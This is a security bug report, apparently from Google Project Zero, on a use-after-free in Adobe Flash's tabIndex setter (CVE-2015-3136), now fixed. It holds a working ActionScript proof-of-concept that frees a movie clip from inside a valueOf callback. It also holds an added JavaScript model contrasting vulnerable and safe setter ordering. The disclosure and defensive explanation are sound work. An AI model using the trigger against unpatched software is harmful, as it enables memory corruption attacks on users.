Starred by 3 users
Status: Fixed
Closed: Jul 2015
Adobe Flash: Use-after-free in tabIndex setter
Project Member Reported by natashenka@google.com, May 14 2015
There is a use-after-free issue in the tabIndex setter in both the Button and MovieClip classes (this issue needs to be fixed in both places). If the tabIndex is set, and then the number parameter has valueOf defined, it is possible to jump into script and free the Button or MovieClip before the tabIndex is set.

A proof-of-concept is as follows:



_global.mc = this;

// The setter coerces n to a number, which calls func() mid-setter.
var n = {valueOf: func};
var test = this.createEmptyMovieClip("test", 1);
test.tabIndex = n;

function func(){
	trace("here");
	//_global.mc.createEmptyMovieClip("test2", 1);
	// Creating a text field at depth 1 replaces the movie clip at that depth;
	// removing it leaves the clip freed while the setter is still running.
	var t = _global.mc.createTextField("test2", 1, 0, 0, 10, 10);
	trace(t);
	t.removeTextField();
	trace("here 2");
	return 7;
}


A sample swf and fla is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
Attachments: settabs.fla (5.8 KB), settabs.swf (973 bytes)
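The bug class behind this report is a native setter that resolves its backing object before running script-visible coercion (valueOf) on the argument. The following JavaScript model is an added illustration, not Adobe's code and not part of the report: NativeClip, Stage and the two setters are hypothetical, and the "free" is simulated with a flag (the report's PoC frees the clip by creating and removing a text field at the same depth; here valueOf removes the clip directly). It contrasts the vulnerable ordering with the defensive one, where coercion runs first and the target is re-resolved afterwards.

```javascript
// Hypothetical model of a host object with a tabIndex setter (constructed example).
class NativeClip {
  constructor(name) { this.name = name; this.tabIndex = 0; this.freed = false; }
}

class Stage {
  constructor() { this.clips = new Map(); }
  createEmptyMovieClip(name) {
    const clip = new NativeClip(name);
    this.clips.set(name, clip);
    return clip;
  }
  // Simulates the engine freeing the clip: flag it and drop it from the display list.
  removeMovieClip(name) {
    const clip = this.clips.get(name);
    if (clip) { clip.freed = true; this.clips.delete(name); }
  }
}

// Vulnerable ordering: resolve the backing object, THEN coerce the argument.
// Number(value) invokes value.valueOf(), which may run arbitrary script.
function setTabIndexUnsafe(stage, name, value) {
  const native = stage.clips.get(name);   // 1. resolve backing object
  const n = Number(value);                // 2. script runs here and may free it
  native.tabIndex = n;                    // 3. write lands on a freed object
  return native.freed ? "write-after-free" : "ok";
}

// Defensive ordering: run all script-visible coercion first, then re-resolve
// the target and bail out if it no longer exists.
function setTabIndexSafe(stage, name, value) {
  const n = Number(value);                // 1. script can only run here
  const native = stage.clips.get(name);   // 2. look up after script has finished
  if (!native) return "target-gone";      // 3. removed during valueOf: refuse to write
  native.tabIndex = n;
  return "ok";
}

// Drive either setter with an argument whose valueOf removes the target clip,
// mirroring the structure of the report's PoC.
function runPoc(setter) {
  const stage = new Stage();
  stage.createEmptyMovieClip("test");
  const n = { valueOf() { stage.removeMovieClip("test"); return 7; } };
  return setter(stage, "test", n);
}
```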
Project Member Comment 1 by natashenka@google.com, May 15 2015
Labels: -Reported-2015-May-14 Reported-2015-May-15
Project Member Comment 2 by natashenka@google.com, May 18 2015
This is PSIRT-3713
Comment 3 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-3136
Comment 4 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 5 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit